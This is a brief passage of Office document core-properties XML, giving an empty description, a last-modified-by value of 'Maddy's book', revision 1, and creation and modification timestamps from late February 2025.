  <dc:description/>
  <cp:lastModifiedBy>Maddy's book</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-27T15:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-28T09:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>